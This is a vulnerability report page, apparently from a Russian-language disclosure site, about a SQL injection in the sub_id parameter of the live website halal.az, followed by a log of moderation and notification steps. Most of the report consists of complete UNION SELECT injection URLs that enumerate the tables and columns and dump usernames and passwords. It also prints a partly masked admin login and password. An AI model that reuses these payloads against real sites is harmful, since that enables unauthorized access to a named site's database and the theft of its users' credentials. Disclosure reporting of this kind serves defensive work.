sub_id= Parametr Sql Inj.

halal.az 20 Июнь 2016, 15:19

Подробная информация

http://www.halal.az/?id=43&sub_id=859 # Sql Vunl
# Column Sayi 26
# version >5
# Login : Admin
# Pass : [email protected]#$%7865****[email protected]!%$$###
# Table_name : coni
# Column_names : l_adi , ppp
Datalari Latin1 Convert ederek ekrana cixarmag olar
<tr>
<td align="center"><a href="?id=43&sub_id=1&lang=1" class="sub_t_link">(HTML KODLARA BAXANDA DATALAR BU HISSEDE GORUNECEY )</a></td>
</tr>
www.halal.az/?id=43&sub_id=-859" UNION SELECT 1,2,3,4,CONVERT(group_concat(table_name) USING latin1),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_schema=database()--+-"&lang=1 # Table_names
www.halal.az/?id=43&sub_id=-859" UNION SELECT 1,2,3,4,CONVERT(group_concat(column_name) USING latin1),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.columns where table_name=0x636f6e69--+-"&lang=1 # Column_names
http://www.halal.az/?id=43&sub_id=-859%22%20UNION%20SELECT%201,2,3,4,CONVERT%28group_concat%28l_adi,0x3a,ppp%29%20USING%20latin1%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20coni--+-%22&lang=1 # Users Data
##############################################################

Записи

  • 21 Октябрь 2016, 13:54
    Статус уязвимости
    Нет ответа от источника

  • 04 Октябрь 2016, 10:04
    Уязвимости присвоен балл
    За перевод уязвимости дано переводчику 8 баллов

  • 04 Октябрь 2016, 10:04
    Уязвимости присвоен балл
    За перевод уязвимости дано автору 0 баллов

  • 22 Август 2016, 10:17
    Статус уязвимости
    Отправлено сообщение об уязвимости на электронный адрес источника

  • 21 Июнь 2016, 13:47
    Уязвимости присвоен балл
    Модератор присвоил 8 баллов из 10-и на уязвимости

  • 21 Июнь 2016, 13:45
    Статус уязвимости
    Подтверждено со стороны модератора

  • 20 Июнь 2016, 15:19
    Добавлена уязвимость
    Добавлена уязвимость на BUGemot